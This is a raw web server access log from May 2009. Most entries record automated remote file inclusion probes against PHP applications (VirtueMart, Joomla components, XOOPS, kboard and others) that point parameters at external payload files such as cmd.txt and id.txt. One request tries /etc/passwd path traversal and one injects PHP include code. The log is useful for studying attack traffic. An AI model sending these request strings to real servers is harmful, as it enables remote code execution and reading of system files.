74.6.17.163 - - [01/May/2009:16:20:52 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
217.160.140.104 - - [01/May/2009:16:36:45 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.businesscardslimited.com///components/com_poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
217.160.140.104 - - [01/May/2009:16:36:45 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.businesscardslimited.com///components/com_poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
202.62.61.45 - - [01/May/2009:16:42:56 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [01/May/2009:16:42:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
218.185.20.88 - - [01/May/2009:16:50:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [01/May/2009:16:50:40 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [01/May/2009:16:50:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:16:52:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
202.62.61.45 - - [01/May/2009:16:56:30 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:16:56:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:16:56:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:17:01:57 -0700] "GET /logs/access_090331.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
220.245.81.22 - - [01/May/2009:17:07:44 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
220.245.81.22 - - [01/May/2009:17:07:45 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.208.68 - - [01/May/2009:17:13:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.68 - - [01/May/2009:17:13:23 -0700] "GET /logs/access_081231.log HTTP/1.1" 200 303093 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:21:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:26:36 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:26:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:26:36 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
66.232.102.70 - - [01/May/2009:17:27:09 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://shop.ars-bitterfeld.de/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
66.232.102.70 - - [01/May/2009:17:27:09 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://shop.ars-bitterfeld.de/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
220.245.81.22 - - [01/May/2009:17:33:12 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
220.245.81.22 - - [01/May/2009:17:33:13 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
220.245.81.22 - - [01/May/2009:17:33:14 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
193.205.136.7 - - [01/May/2009:17:40:17 -0700] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.wirama.com"
193.205.136.7 - - [01/May/2009:17:40:17 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.wirama.com"
220.245.81.22 - - [01/May/2009:17:41:19 -0700] "GET /logs/access_090331.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:42:39 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:42:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:42:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
62.173.161.148 - - [01/May/2009:17:48:55 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.173.161.148 - - [01/May/2009:17:48:55 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.173.161.148 - - [01/May/2009:17:48:56 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
91.206.183.148 - - [01/May/2009:17:51:19 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
91.206.183.148 - - [01/May/2009:17:51:19 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
91.206.183.148 - - [01/May/2009:17:51:19 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
91.206.183.148 - - [01/May/2009:17:51:20 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
207.57.79.26 - - [01/May/2009:17:51:20 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
91.206.183.148 - - [01/May/2009:17:51:20 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
207.57.79.26 - - [01/May/2009:17:51:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
91.206.183.148 - - [01/May/2009:17:51:20 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
207.57.79.26 - - [01/May/2009:17:51:20 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:51:25 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:51:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [01/May/2009:17:51:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
62.173.161.148 - - [01/May/2009:17:54:43 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.173.161.148 - - [01/May/2009:17:54:43 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.173.161.148 - - [01/May/2009:17:54:44 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
213.188.180.77 - - [01/May/2009:17:58:13 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
65.254.63.210 - - [01/May/2009:18:02:43 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:18:02:43 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:18:02:45 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.254.63.210 - - [01/May/2009:18:03:14 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:30 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:30 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:31 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:31 -0700] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:31 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
88.198.44.188 - - [01/May/2009:18:03:31 -0700] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.103.16.43 - - [01/May/2009:18:23:14 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:18:23:14 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:18:23:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.62.61.45 - - [01/May/2009:18:24:29 -0700] "GET /logs/access_090329.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:18:24:30 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [01/May/2009:18:24:30 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.poprepublic.tv/v2//administrator/components/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
80.172.236.56 - - [01/May/2009:18:47:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [01/May/2009:18:47:51 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [01/May/2009:18:47:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [01/May/2009:18:49:55 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:18:58:07 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:18:58:07 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:18:58:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:19:06:47 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.89.31.105 - - [01/May/2009:19:23:28 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
69.89.31.105 - - [01/May/2009:19:23:28 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
200.103.16.43 - - [01/May/2009:19:30:18 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:19:30:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:19:30:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.110.25.63 - - [01/May/2009:19:30:34 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
61.110.25.63 - - [01/May/2009:19:30:34 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
80.172.236.56 - - [01/May/2009:19:31:35 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
